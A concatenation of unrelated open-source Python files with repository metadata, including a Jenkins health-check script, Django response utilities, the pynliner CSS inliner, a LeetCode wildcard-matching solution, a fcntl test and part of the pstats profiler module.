exit_code = 0
if health_score <= critical_threshold:
exit_code = 2
elif health_score <= warning_threshold:
exit_code = 1
return exit_code, 'Jenkins job health score is ' + str(health_score)
except Exception, e:
return 2, 'Error checking jenkins job status: ' + e.message
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Check jenkins job status.')
parser.add_argument('--job', required=True, type=str, help='the job name to check for')
parser.add_argument('-w', required=True, type=int, help='warning threshold of health score')
parser.add_argument('-c', required=True, type=int, help='critical threshold of health score')
args = parser.parse_args()
code, message = check_jenkins_status(args.job, args.w, args.c)
print message
exit(code)
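# Example invocation (the job name is illustrative; thresholds are Jenkins
# health-report scores, 0-100):
#
#   ./check_jenkins.py --job cinder-ci -w 80 -c 50
#
# Prints the health score (or an error message) and exits 0 (OK),
# 1 (warning) or 2 (critical), following the Nagios plugin convention.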
|
apache-2.0
|
mapr/hue
|
desktop/core/ext-py/Django-1.6.10/django/http/utils.py
|
134
|
1501
|
"""
Functions that modify an HTTP request or response in some way.
"""
# This group of functions are run as part of the response handling, after
# everything else, including all response middleware. Think of them as
# "compulsory response middleware". Be careful about what goes here, because
# it's a little fiddly to override this behavior, so they should be truly
# universally applicable.
def fix_location_header(request, response):
"""
Ensures that we always use an absolute URI in any location header in the
response. This is required by RFC 2616, section 14.30.
Code constructing response objects is free to insert relative paths, as
this function converts them to absolute paths.
"""
if 'Location' in response and request.get_host():
response['Location'] = request.build_absolute_uri(response['Location'])
return response
def conditional_content_removal(request, response):
"""
Removes the content of responses for HEAD requests, 1xx, 204 and 304
responses. Ensures compliance with RFC 2616, section 4.3.
"""
if 100 <= response.status_code < 200 or response.status_code in (204, 304):
if response.streaming:
response.streaming_content = []
else:
response.content = b''
response['Content-Length'] = '0'
if request.method == 'HEAD':
if response.streaming:
response.streaming_content = []
else:
response.content = b''
return response
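# Behaviour sketch (not part of the original module; assumes configured
# Django settings and an HttpRequest instance named `request`):
#   response = HttpResponse(b'ignored', status=204)
#   response = conditional_content_removal(request, response)
#   # -> response.content == b'' and response['Content-Length'] == '0'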
|
apache-2.0
|
EduPepperPD/pepper2013
|
lms/djangoapps/bulk_email/forms.py
|
8
|
1640
|
"""
Defines a form for providing validation of CourseEmail templates.
"""
import logging
from django import forms
from django.core.exceptions import ValidationError
from bulk_email.models import CourseEmailTemplate, COURSE_EMAIL_MESSAGE_BODY_TAG
log = logging.getLogger(__name__)
class CourseEmailTemplateForm(forms.ModelForm):
"""Form providing validation of CourseEmail templates."""
class Meta: # pylint: disable=C0111
model = CourseEmailTemplate
def _validate_template(self, template):
"""Check the template for required tags."""
index = template.find(COURSE_EMAIL_MESSAGE_BODY_TAG)
if index < 0:
msg = 'Missing tag: "{}"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)
log.warning(msg)
raise ValidationError(msg)
if template.find(COURSE_EMAIL_MESSAGE_BODY_TAG, index + 1) >= 0:
msg = 'Multiple instances of tag: "{}"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)
log.warning(msg)
raise ValidationError(msg)
# TODO: add more validation here, including the set of known tags
# for which values will be supplied. (Email will fail if the template
# uses tags for which values are not supplied.)
def clean_html_template(self):
"""Validate the HTML template."""
template = self.cleaned_data["html_template"]
self._validate_template(template)
return template
def clean_plain_template(self):
"""Validate the plaintext template."""
template = self.cleaned_data["plain_template"]
self._validate_template(template)
return template
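# Validation sketch (hypothetical template strings; TAG stands for whatever
# COURSE_EMAIL_MESSAGE_BODY_TAG expands to):
#   form._validate_template('no tag here')        # raises ValidationError (missing)
#   form._validate_template(TAG + ' ... ' + TAG)  # raises ValidationError (duplicate)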
|
agpl-3.0
|
314r/joliebulle
|
joliebulle/view/base.py
|
1
|
1815
|
#joliebulle 3.6
#Copyright (C) 2010-2016 Pierre Tavares
#Copyright (C) 2012-2015 joliebulle's authors
#See AUTHORS file.
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 3
#of the License, or (at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from PyQt5 import QtGui
from base import ImportBase
from view.yeastview import *
def getFermentablesQtModel():
model = QtGui.QStandardItemModel()
for f in ImportBase().listeFermentables:
item = QtGui.QStandardItem(f.name)
item.setData(f, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
def getHopsQtModel():
model = QtGui.QStandardItemModel()
for h in ImportBase().listeHops :
item = QtGui.QStandardItem(h.name)
item.setData(h, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
def getMiscsQtModel():
model = QtGui.QStandardItemModel()
for m in ImportBase().listeMiscs:
item = QtGui.QStandardItem(m.name)
item.setData(m, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
def getYeastsQtModel():
model = QtGui.QStandardItemModel()
for y in ImportBase().listeYeasts:
item = QtGui.QStandardItem(YeastView(y).yeastDetailDisplay())
item.setData(y, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
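# Usage sketch (hypothetical; assumes a running QApplication and a populated
# ImportBase):
#   from PyQt5 import QtWidgets
#   combo = QtWidgets.QComboBox()
#   combo.setModel(getYeastsQtModel())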
|
gpl-3.0
|
mihaip/NewsBlur
|
vendor/pynliner/__init__.py
|
19
|
9059
|
#!/usr/bin/env python
"""Pynliner : Convert CSS to inline styles
Python CSS-to-inline-styles conversion tool for HTML using BeautifulSoup and cssutils
Copyright (c) 2011 Tanner Netterville
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
The generated output of this software shall not be used in a mass marketing service.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__version__ = "0.4.0"
import urllib2
import cssutils
from BeautifulSoup import BeautifulSoup
from soupselect import select
class Pynliner(object):
"""Pynliner class"""
soup = False
style_string = False
stylesheet = False
output = False
def __init__(self, log=None):
self.log = log
cssutils.log.enabled = False if log is None else True
def from_url(self, url):
"""Gets remote HTML page for conversion
Downloads HTML page from `url` as a string and passes it to the
`from_string` method. Also sets `self.root_url` and `self.relative_url`
for use in importing <link> elements.
Returns self.
>>> p = Pynliner()
>>> p.from_url('http://somewebsite.com/file.html')
<Pynliner object at 0x26ac70>
"""
self.url = url
self.relative_url = '/'.join(url.split('/')[:-1]) + '/'
self.root_url = '/'.join(url.split('/')[:3])
self.source_string = self._get_url(self.url)
return self
def from_string(self, string):
"""Generates a Pynliner object from the given HTML string.
Returns self.
>>> p = Pynliner()
>>> p.from_string('<style>h1 { color:#ffcc00; }</style><h1>Hello World!</h1>')
<Pynliner object at 0x26ac70>
"""
self.source_string = string
return self
def with_cssString(self, cssString):
"""Adds external CSS to the Pynliner object. Can be "chained".
Returns self.
>>> html = "<h1>Hello World!</h1>"
>>> css = "h1 { color:#ffcc00; }"
>>> p = Pynliner()
>>> p.from_string(html).with_cssString(css)
<pynliner.Pynliner object at 0x2ca810>
"""
if not self.style_string:
self.style_string = cssString + u'\n'
else:
self.style_string += cssString + u'\n'
return self
def run(self):
"""Applies each step of the process if they have not already been
performed.
Returns Unicode output with applied styles.
>>> html = "<style>h1 { color:#ffcc00; }</style><h1>Hello World!</h1>"
>>> Pynliner().from_string(html).run()
u'<h1 style="color: #fc0">Hello World!</h1>'
"""
if not self.soup:
self._get_soup()
if not self.stylesheet:
self._get_styles()
self._apply_styles()
return self._get_output()
def _get_url(self, url):
"""Returns the response content from the given url
"""
return urllib2.urlopen(url).read()
def _get_soup(self):
"""Convert source string to BeautifulSoup object. Sets it to self.soup.
        If using mod_wsgi, use html5 parsing to prevent BeautifulSoup incompatibility.
"""
# Check if mod_wsgi is running - see http://code.google.com/p/modwsgi/wiki/TipsAndTricks
try:
from mod_wsgi import version
self.soup = BeautifulSoup(self.source_string, "html5lib")
        except ImportError:
self.soup = BeautifulSoup(self.source_string)
def _get_styles(self):
"""Gets all CSS content from and removes all <link rel="stylesheet"> and
<style> tags concatenating into one CSS string which is then parsed with
cssutils and the resulting CSSStyleSheet object set to
`self.stylesheet`.
"""
self._get_external_styles()
self._get_internal_styles()
cssparser = cssutils.CSSParser(log=self.log)
self.stylesheet = cssparser.parseString(self.style_string)
def _get_external_styles(self):
"""Gets <link> element styles
"""
if not self.style_string:
self.style_string = u''
else:
self.style_string += u'\n'
link_tags = self.soup.findAll('link', {'rel': 'stylesheet'})
for tag in link_tags:
url = tag['href']
if url.startswith('http://'):
pass
elif url.startswith('/'):
url = self.root_url + url
else:
url = self.relative_url + url
self.style_string += self._get_url(url)
tag.extract()
def _get_internal_styles(self):
"""Gets <style> element styles
"""
if not self.style_string:
self.style_string = u''
else:
self.style_string += u'\n'
style_tags = self.soup.findAll('style')
for tag in style_tags:
self.style_string += u'\n'.join(tag.contents) + u'\n'
tag.extract()
def _get_specificity_from_list(self, lst):
"""
Takes an array of ints and returns an integer formed
by adding all ints multiplied by the power of 10 of the current index
(1, 0, 0, 1) => (1 * 10**3) + (0 * 10**2) + (0 * 10**1) + (1 * 10**0) => 1001
"""
return int(''.join(map(str, lst)))
def _get_rule_specificity(self, rule):
"""
For a given CSSRule get its selector specificity in base 10
"""
return sum(map(self._get_specificity_from_list, (s.specificity for s in rule.selectorList)))
def _apply_styles(self):
"""Steps through CSS rules and applies each to all the proper elements
as @style attributes prepending any current @style attributes.
"""
rules = self.stylesheet.cssRules.rulesOfType(1)
elem_prop_map = {}
elem_style_map = {}
# build up a property list for every styled element
for rule in rules:
# select elements for every selector
selectors = rule.selectorText.split(',')
elements = []
for selector in selectors:
elements += select(self.soup, selector)
# build prop_list for each selected element
for elem in elements:
if elem not in elem_prop_map:
elem_prop_map[elem] = []
elem_prop_map[elem].append({
'specificity': self._get_rule_specificity(rule),
'props': rule.style.getProperties(),
})
# build up another property list using selector specificity
for elem, props in elem_prop_map.items():
if elem not in elem_style_map:
elem_style_map[elem] = cssutils.css.CSSStyleDeclaration()
# ascending sort of prop_lists based on specificity
props = sorted(props, key=lambda p: p['specificity'])
# for each prop_list, apply to CSSStyleDeclaration
for prop_list in map(lambda obj: obj['props'], props):
for prop in prop_list:
elem_style_map[elem][prop.name] = prop.value
# apply rules to elements
for elem, style_declaration in elem_style_map.items():
if elem.has_key('style'):
elem['style'] = u'%s; %s' % (style_declaration.cssText.replace('\n', ' '), elem['style'])
else:
elem['style'] = style_declaration.cssText.replace('\n', ' ')
def _get_output(self):
"""Generate Unicode string of `self.soup` and set it to `self.output`
Returns self.output
"""
self.output = unicode(str(self.soup))
return self.output
def fromURL(url, log=None):
"""Shortcut Pynliner constructor. Equivelent to:
>>> Pynliner().from_url(someURL).run()
Returns processed HTML string.
"""
return Pynliner(log).from_url(url).run()
def fromString(string, log=None):
"""Shortcut Pynliner constructor. Equivelent to:
>>> Pynliner().from_string(someString).run()
Returns processed HTML string.
"""
return Pynliner(log).from_string(string).run()
|
mit
|
shawncaojob/LC
|
QUESTIONS/44_wildcard_matching.py
|
1
|
1859
|
# 44. Wildcard Matching (LeetCode; Difficulty: Hard)
# Implement wildcard pattern matching with support for '?' and '*'.
#
# '?' Matches any single character.
# '*' Matches any sequence of characters (including the empty sequence).
#
# The matching should cover the entire input string (not partial).
#
# The function prototype should be:
# bool isMatch(const char *s, const char *p)
#
# Some examples:
# isMatch("aa","a") false
# isMatch("aa","aa") true
# isMatch("aaa","aa") false
# isMatch("aa", "*") true
# isMatch("aa", "a*") true
# isMatch("ab", "?*") true
# isMatch("aab", "c*a*b") false
class Solution(object):
def isMatch(self, s, p):
"""
:type s: str
:type p: str
:rtype: bool
"""
print(s, p)
m, n = len(s), len(p)
dp = [ [ False for y in xrange(n + 1) ] for x in xrange(m + 1) ]
dp[0][0] = True
for j in xrange(1, n + 1):
if p[j-1] == "*" and dp[0][j-1]:
dp[0][j] = True
for i in xrange(1, m + 1):
for j in xrange(1, n + 1):
if (s[i-1] == p[j-1] or p[j-1] == "?") and dp[i-1][j-1]: #Cur char matching
dp[i][j] = True
if p[j-1] == "*":
if dp[i][j-1] or dp[i-1][j]: # Matching 0 or more
dp[i][j] = True
for row in dp:
print(row)
return dp[-1][-1]
if __name__ == "__main__":
print(Solution().isMatch("aa","a"))
print(Solution().isMatch("aa","aa"))
print(Solution().isMatch("aaa","aa"))
print(Solution().isMatch("aa", "*"))
print(Solution().isMatch("aa", "a*"))
print(Solution().isMatch("ab", "?*"))
print(Solution().isMatch("aab", "c*a*b"))
|
gpl-3.0
|
aminert/scikit-learn
|
sklearn/feature_selection/__init__.py
|
244
|
1088
|
"""
The :mod:`sklearn.feature_selection` module implements feature selection
algorithms. It currently includes univariate filter selection methods and the
recursive feature elimination algorithm.
"""
from .univariate_selection import chi2
from .univariate_selection import f_classif
from .univariate_selection import f_oneway
from .univariate_selection import f_regression
from .univariate_selection import SelectPercentile
from .univariate_selection import SelectKBest
from .univariate_selection import SelectFpr
from .univariate_selection import SelectFdr
from .univariate_selection import SelectFwe
from .univariate_selection import GenericUnivariateSelect
from .variance_threshold import VarianceThreshold
from .rfe import RFE
from .rfe import RFECV
__all__ = ['GenericUnivariateSelect',
'RFE',
'RFECV',
'SelectFdr',
'SelectFpr',
'SelectFwe',
'SelectKBest',
'SelectPercentile',
'VarianceThreshold',
'chi2',
'f_classif',
'f_oneway',
'f_regression']
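# Usage sketch (not part of this module; X and y are hypothetical arrays):
#   from sklearn.feature_selection import SelectKBest, chi2
#   X_reduced = SelectKBest(chi2, k=10).fit_transform(X, y)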
|
bsd-3-clause
|
Kongsea/tensorflow
|
tensorflow/python/keras/applications/inception_resnet_v2/__init__.py
|
23
|
1193
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""InceptionResNetV2 Keras application."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras._impl.keras.applications.inception_resnet_v2 import decode_predictions
from tensorflow.python.keras._impl.keras.applications.inception_resnet_v2 import InceptionResNetV2
from tensorflow.python.keras._impl.keras.applications.inception_resnet_v2 import preprocess_input
del absolute_import
del division
del print_function
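# Usage sketch (hypothetical; downloads ImageNet weights on first use):
#   model = InceptionResNetV2(weights='imagenet')
#   preds = model.predict(preprocess_input(batch))  # batch: (N, 299, 299, 3)
#   print(decode_predictions(preds, top=3))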
|
apache-2.0
|
caioariede/pyq
|
sizzle/match.py
|
1
|
3323
|
from .selector import Selector
class MatchEngine(object):
pseudo_fns = {}
selector_class = Selector
def __init__(self):
self.register_pseudo('not', self.pseudo_not)
self.register_pseudo('has', self.pseudo_has)
def register_pseudo(self, name, fn):
self.pseudo_fns[name] = fn
@staticmethod
def pseudo_not(matcher, node, value):
return not matcher.match_node(matcher.parse_selector(value)[0], node)
@staticmethod
def pseudo_has(matcher, node, value):
for node, body in matcher.iter_data([node]):
if body:
return any(
matcher.match_data(matcher.parse_selector(value)[0], body))
def parse_selector(self, selector):
return self.selector_class.parse(selector)
def match(self, selector, data):
selectors = self.parse_selector(selector)
nodeids = {}
for selector in selectors:
for node in self.match_data(selector, data):
nodeid = id(node)
if nodeid not in nodeids:
nodeids[nodeid] = None
yield node
def match_data(self, selector, data):
for node, body in self._iter_data(data):
match = self.match_node(selector, node)
if match:
next_selector = selector.next_selector
if next_selector:
if body:
for node in self.match_data(next_selector, body):
yield node
else:
yield node
if body and not selector.combinator == self.selector_class.CHILD:
for node in self.match_data(selector, body):
yield node
def match_node(self, selector, node):
match = all(self.match_rules(selector, node))
if match and selector.attrs:
match &= all(self.match_attrs(selector, node))
if match and selector.pseudos:
match &= all(self.match_pseudos(selector, node))
return match
def match_rules(self, selector, node):
if selector.typ:
yield self.match_type(selector.typ, node)
if selector.id_:
yield self.match_id(selector.id_, node)
def match_attrs(self, selector, node):
for a in selector.attrs:
lft, op, rgt = a
yield self.match_attr(lft, op, rgt, node)
def match_pseudos(self, selector, d):
for p in selector.pseudos:
name, value = p
if name not in self.pseudo_fns:
raise Exception('Selector not implemented: {}'.format(name))
yield self.pseudo_fns[name](self, d, value)
def _iter_data(self, data):
for tupl in self.iter_data(data):
if len(tupl) != 2:
raise Exception(
'The iter_data method must yield pair tuples containing '
'the node and its body (empty if not available)')
yield tupl
def match_type(self, typ, node):
raise NotImplementedError
def match_id(self, id_, node):
raise NotImplementedError
def match_attr(self, lft, op, rgt, no):
raise NotImplementedError
def iter_data(self, data):
raise NotImplementedError
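# Subclassing sketch (hypothetical engine over nested dicts): a concrete
# MatchEngine only needs to supply the four primitives above, e.g.:
#   class DictMatchEngine(MatchEngine):
#       def match_type(self, typ, node):
#           return node.get('type') == typ
#       def match_id(self, id_, node):
#           return node.get('id') == id_
#       def match_attr(self, lft, op, rgt, node):
#           return op == '=' and node.get(lft) == rgt
#       def iter_data(self, data):
#           for node in data:
#               yield node, node.get('children', [])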
|
mit
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/test/test_fcntl.py
|
5
|
2984
|
"""Test program for the fcntl C module.
OS/2+EMX doesn't support the file locking operations.
"""
import os
import struct
import sys
import unittest
from test.support import verbose, TESTFN, unlink, run_unittest, import_module
# Skip test if no fcntl module.
fcntl = import_module('fcntl')
# TODO - Write tests for flock() and lockf().
def get_lockdata():
try:
os.O_LARGEFILE
except AttributeError:
start_len = "ll"
else:
start_len = "qq"
if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd', 'bsdos'))
or sys.platform == 'darwin'):
if struct.calcsize('l') == 8:
off_t = 'l'
pid_t = 'i'
else:
off_t = 'lxxxx'
pid_t = 'l'
lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0,
fcntl.F_WRLCK, 0)
elif sys.platform in ['aix3', 'aix4', 'hp-uxB', 'unixware7']:
lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0)
elif sys.platform in ['os2emx']:
lockdata = None
else:
lockdata = struct.pack('hh'+start_len+'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0)
if lockdata:
if verbose:
print('struct.pack: ', repr(lockdata))
return lockdata
lockdata = get_lockdata()
class TestFcntl(unittest.TestCase):
def setUp(self):
self.f = None
def tearDown(self):
if self.f and not self.f.closed:
self.f.close()
unlink(TESTFN)
def test_fcntl_fileno(self):
# the example from the library docs
self.f = open(TESTFN, 'wb')
rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
if verbose:
print('Status from fcntl with O_NONBLOCK: ', rv)
if sys.platform not in ['os2emx']:
rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETLKW, lockdata)
if verbose:
print('String from fcntl with F_SETLKW: ', repr(rv))
self.f.close()
def test_fcntl_file_descriptor(self):
# again, but pass the file rather than numeric descriptor
self.f = open(TESTFN, 'wb')
rv = fcntl.fcntl(self.f, fcntl.F_SETFL, os.O_NONBLOCK)
if sys.platform not in ['os2emx']:
rv = fcntl.fcntl(self.f, fcntl.F_SETLKW, lockdata)
self.f.close()
def test_fcntl_64_bit(self):
# Issue #1309352: fcntl shouldn't fail when the third arg fits in a
# C 'long' but not in a C 'int'.
try:
cmd = fcntl.F_NOTIFY
# This flag is larger than 2**31 in 64-bit builds
flags = fcntl.DN_MULTISHOT
except AttributeError:
self.skipTest("F_NOTIFY or DN_MULTISHOT unavailable")
fd = os.open(os.path.dirname(os.path.abspath(TESTFN)), os.O_RDONLY)
try:
fcntl.fcntl(fd, cmd, flags)
finally:
os.close(fd)
def test_main():
run_unittest(TestFcntl)
if __name__ == '__main__':
test_main()
|
mit
|
tunneln/CarnotKE
|
jyhton/lib-python/2.7/pstats.py
|
117
|
26711
|
"""Class for printing reports on profiled python code."""
# Written by James Roskind
# Based on prior profile module by Sjoerd Mullender...
# which was hacked somewhat by: Guido van Rossum
# Copyright Disney Enterprises, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import sys
import os
import time
import marshal
import re
from functools import cmp_to_key
__all__ = ["Stats"]
class Stats:
"""This class is used for creating reports from data generated by the
Profile class. It is a "friend" of that class, and imports data either
by direct access to members of Profile class, or by reading in a dictionary
that was emitted (via marshal) from the Profile class.
The big change from the previous Profiler (in terms of raw functionality)
is that an "add()" method has been provided to combine Stats from
several distinct profile runs. Both the constructor and the add()
method now take arbitrarily many file names as arguments.
All the print methods now take an argument that indicates how many lines
to print. If the arg is a floating point number between 0 and 1.0, then
it is taken as a decimal percentage of the available lines to be printed
(e.g., .1 means print 10% of all available lines). If it is an integer,
it is taken to mean the number of lines of data that you wish to have
printed.
The sort_stats() method now processes some additional options (i.e., in
addition to the old -1, 0, 1, or 2). It takes an arbitrary number of
quoted strings to select the sort order. For example sort_stats('time',
'name') sorts on the major key of 'internal function time', and on the
minor key of 'the name of the function'. Look at the two tables in
sort_stats() and get_sort_arg_defs(self) for more examples.
All methods return self, so you can string together commands like:
Stats('foo', 'goo').strip_dirs().sort_stats('calls').\
print_stats(5).print_callers(5)
"""
def __init__(self, *args, **kwds):
        # I can't figure out how to explicitly specify a stream keyword arg
        # with *args:
        # def __init__(self, *args, stream=sys.stdout): ...
        # so I use **kwds and squawk if something unexpected is passed in.
self.stream = sys.stdout
if "stream" in kwds:
self.stream = kwds["stream"]
del kwds["stream"]
if kwds:
keys = kwds.keys()
keys.sort()
extras = ", ".join(["%s=%s" % (k, kwds[k]) for k in keys])
raise ValueError, "unrecognized keyword args: %s" % extras
if not len(args):
arg = None
else:
arg = args[0]
args = args[1:]
self.init(arg)
self.add(*args)
def init(self, arg):
self.all_callees = None # calc only if needed
self.files = []
self.fcn_list = None
self.total_tt = 0
self.total_calls = 0
self.prim_calls = 0
self.max_name_len = 0
self.top_level = {}
self.stats = {}
self.sort_arg_dict = {}
self.load_stats(arg)
trouble = 1
try:
self.get_top_level_stats()
trouble = 0
finally:
if trouble:
print >> self.stream, "Invalid timing data",
if self.files: print >> self.stream, self.files[-1],
print >> self.stream
def load_stats(self, arg):
if not arg: self.stats = {}
elif isinstance(arg, basestring):
f = open(arg, 'rb')
self.stats = marshal.load(f)
f.close()
try:
file_stats = os.stat(arg)
arg = time.ctime(file_stats.st_mtime) + " " + arg
except: # in case this is not unix
pass
self.files = [ arg ]
elif hasattr(arg, 'create_stats'):
arg.create_stats()
self.stats = arg.stats
arg.stats = {}
if not self.stats:
raise TypeError("Cannot create or construct a %r object from %r"
% (self.__class__, arg))
return
def get_top_level_stats(self):
for func, (cc, nc, tt, ct, callers) in self.stats.items():
self.total_calls += nc
self.prim_calls += cc
self.total_tt += tt
if ("jprofile", 0, "profiler") in callers:
self.top_level[func] = None
if len(func_std_string(func)) > self.max_name_len:
self.max_name_len = len(func_std_string(func))
def add(self, *arg_list):
if not arg_list: return self
if len(arg_list) > 1: self.add(*arg_list[1:])
other = arg_list[0]
if type(self) != type(other) or self.__class__ != other.__class__:
other = Stats(other)
self.files += other.files
self.total_calls += other.total_calls
self.prim_calls += other.prim_calls
self.total_tt += other.total_tt
for func in other.top_level:
self.top_level[func] = None
if self.max_name_len < other.max_name_len:
self.max_name_len = other.max_name_len
self.fcn_list = None
for func, stat in other.stats.iteritems():
if func in self.stats:
old_func_stat = self.stats[func]
else:
old_func_stat = (0, 0, 0, 0, {},)
self.stats[func] = add_func_stats(old_func_stat, stat)
return self
def dump_stats(self, filename):
"""Write the profile data to a file we know how to load back."""
f = file(filename, 'wb')
try:
marshal.dump(self.stats, f)
finally:
f.close()
# list the tuple indices and directions for sorting,
# along with some printable description
sort_arg_dict_default = {
"calls" : (((1,-1), ), "call count"),
"ncalls" : (((1,-1), ), "call count"),
"cumtime" : (((3,-1), ), "cumulative time"),
"cumulative": (((3,-1), ), "cumulative time"),
"file" : (((4, 1), ), "file name"),
"filename" : (((4, 1), ), "file name"),
"line" : (((5, 1), ), "line number"),
"module" : (((4, 1), ), "file name"),
"name" : (((6, 1), ), "function name"),
"nfl" : (((6, 1),(4, 1),(5, 1),), "name/file/line"),
"pcalls" : (((0,-1), ), "primitive call count"),
"stdname" : (((7, 1), ), "standard name"),
"time" : (((2,-1), ), "internal time"),
"tottime" : (((2,-1), ), "internal time"),
}
def get_sort_arg_defs(self):
"""Expand all abbreviations that are unique."""
if not self.sort_arg_dict:
self.sort_arg_dict = dict = {}
bad_list = {}
for word, tup in self.sort_arg_dict_default.iteritems():
fragment = word
while fragment:
if not fragment:
break
if fragment in dict:
bad_list[fragment] = 0
break
dict[fragment] = tup
fragment = fragment[:-1]
for word in bad_list:
del dict[word]
return self.sort_arg_dict
def sort_stats(self, *field):
if not field:
self.fcn_list = 0
return self
if len(field) == 1 and isinstance(field[0], (int, long)):
# Be compatible with old profiler
field = [ {-1: "stdname",
0: "calls",
1: "time",
2: "cumulative"}[field[0]] ]
sort_arg_defs = self.get_sort_arg_defs()
sort_tuple = ()
self.sort_type = ""
connector = ""
for word in field:
sort_tuple = sort_tuple + sort_arg_defs[word][0]
self.sort_type += connector + sort_arg_defs[word][1]
connector = ", "
stats_list = []
for func, (cc, nc, tt, ct, callers) in self.stats.iteritems():
stats_list.append((cc, nc, tt, ct) + func +
(func_std_string(func), func))
stats_list.sort(key=cmp_to_key(TupleComp(sort_tuple).compare))
self.fcn_list = fcn_list = []
for tuple in stats_list:
fcn_list.append(tuple[-1])
return self
def reverse_order(self):
if self.fcn_list:
self.fcn_list.reverse()
return self
def strip_dirs(self):
oldstats = self.stats
self.stats = newstats = {}
max_name_len = 0
for func, (cc, nc, tt, ct, callers) in oldstats.iteritems():
newfunc = func_strip_path(func)
if len(func_std_string(newfunc)) > max_name_len:
max_name_len = len(func_std_string(newfunc))
newcallers = {}
for func2, caller in callers.iteritems():
newcallers[func_strip_path(func2)] = caller
if newfunc in newstats:
newstats[newfunc] = add_func_stats(
newstats[newfunc],
(cc, nc, tt, ct, newcallers))
else:
newstats[newfunc] = (cc, nc, tt, ct, newcallers)
old_top = self.top_level
self.top_level = new_top = {}
for func in old_top:
new_top[func_strip_path(func)] = None
self.max_name_len = max_name_len
self.fcn_list = None
self.all_callees = None
return self
def calc_callees(self):
if self.all_callees: return
self.all_callees = all_callees = {}
for func, (cc, nc, tt, ct, callers) in self.stats.iteritems():
if not func in all_callees:
all_callees[func] = {}
for func2, caller in callers.iteritems():
if not func2 in all_callees:
all_callees[func2] = {}
all_callees[func2][func] = caller
return
#******************************************************************
# The following functions support actual printing of reports
#******************************************************************
# Optional "amount" is either a line count, or a percentage of lines.
def eval_print_amount(self, sel, list, msg):
new_list = list
if isinstance(sel, basestring):
try:
rex = re.compile(sel)
except re.error:
msg += " <Invalid regular expression %r>\n" % sel
return new_list, msg
new_list = []
for func in list:
if rex.search(func_std_string(func)):
new_list.append(func)
else:
count = len(list)
if isinstance(sel, float) and 0.0 <= sel < 1.0:
count = int(count * sel + .5)
new_list = list[:count]
elif isinstance(sel, (int, long)) and 0 <= sel < count:
count = sel
new_list = list[:count]
if len(list) != len(new_list):
msg += " List reduced from %r to %r due to restriction <%r>\n" % (
len(list), len(new_list), sel)
return new_list, msg
def get_print_list(self, sel_list):
width = self.max_name_len
if self.fcn_list:
stat_list = self.fcn_list[:]
msg = " Ordered by: " + self.sort_type + '\n'
else:
stat_list = self.stats.keys()
msg = " Random listing order was used\n"
for selection in sel_list:
stat_list, msg = self.eval_print_amount(selection, stat_list, msg)
count = len(stat_list)
if not stat_list:
return 0, stat_list
print >> self.stream, msg
if count < len(self.stats):
width = 0
for func in stat_list:
if len(func_std_string(func)) > width:
width = len(func_std_string(func))
return width+2, stat_list
def print_stats(self, *amount):
for filename in self.files:
print >> self.stream, filename
if self.files: print >> self.stream
indent = ' ' * 8
for func in self.top_level:
print >> self.stream, indent, func_get_function_name(func)
print >> self.stream, indent, self.total_calls, "function calls",
if self.total_calls != self.prim_calls:
print >> self.stream, "(%d primitive calls)" % self.prim_calls,
print >> self.stream, "in %.3f seconds" % self.total_tt
print >> self.stream
width, list = self.get_print_list(amount)
if list:
self.print_title()
for func in list:
self.print_line(func)
print >> self.stream
print >> self.stream
return self
def print_callees(self, *amount):
width, list = self.get_print_list(amount)
